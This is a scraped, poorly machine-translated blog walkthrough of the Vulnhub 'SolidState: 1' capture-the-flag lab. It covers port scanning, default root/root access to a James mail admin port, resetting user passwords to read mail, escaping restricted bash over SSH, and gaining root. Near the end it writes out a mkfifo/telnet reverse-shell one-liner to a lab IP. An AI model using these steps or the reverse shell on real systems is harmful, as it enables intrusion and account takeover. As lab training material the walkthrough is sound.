当前位置:网站首页>Vulnhub solidstate: 1 target penetration test
Vulnhub solidstate: 1 target penetration test
2022-07-24 05:38:00 【Outstanding, outstanding】
One 、ip Probe

Two 、 Port detection
- Found frequent occurrence of james, also 4555 Port is still running james-admin

3、 ... and 、 Port information collection

- Check the script , Discover the use of root/root Connect 4555 port


Four 、 Port information utilization
4.1 nc Connect 4555 port (root/root)
- found 5 Users , And will 5 User passwords are reset to 123


4.2 Log in to the account in turn , Check email (POP3)
- Use telnet After logging in to the email , Find out john There is a letter about mindy The mail

- Sign in mindy Check the email content in your account , Find out ssh User name and password

4.3 Sign in ssh
- After logging in, I found it was a restricted rbash, Many commands cannot be executed

4.4 rbash Bypass
- stay ssh Try to bypass when logging in

4.5 Upgrade terminal
- Terminal optimization

python -c 'import pty; pty.spawn("/bin/bash")' ctrl + z stty raw -echo;fg export TERM=xterm reset4.6 View other user processes
- adopt /etc/passwd Knowledge still exists james user , View the user process , Get into /opt Catalog , found root File of account Authority

4.7 Write bounce shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet 172.16.9.9 3333 > /tmp/f
4.8 Turn on local monitoring
- Received a rebound shell by root jurisdiction , The right raising is completed .

边栏推荐
猜你喜欢
随机推荐
一文node安装下载和配置
过渡 效果
XML解析
【百度地图API】您所使用的地图JS API版本过低,已不再维护,为保证地图基本功能 正常使用,请尽快升级到最新版地图JS API
There are three ways to create in Polkadot - parallel chain, parallel thread, and smart contract
Scarcity in Web3: how to become a winner in a decentralized world
量化合约夹子套利机器人系统逻辑开发原理分析
canvas - 圆形
The profound meaning of unlimited ecological development in Poka -- Multidimensional Interpretation of parallel chain
Web3基金会「Grant计划」赋能开发者,盘点四大成功项目
MySQL的使用
Function analysis of GeoServer rest API
Mobile software development ISO simple wechat
Some thoughts on being a professional
Pycharm configures LAN access, and the LAN cannot access the solution
4. Draw a red triangle and a yellow square on the screen. Triangle in the back, small; Square in front, big. Using the fusion technology, the triangle can be seen through the square, and the source an
px和em和rem区别
Promise续(尝试自己实现一个promise)更详细的注释和其它接口暂未完成,下次咱们继续。
去中心化的底层是共识——Polkadot 混合共识机制解读
Function_ This keyword









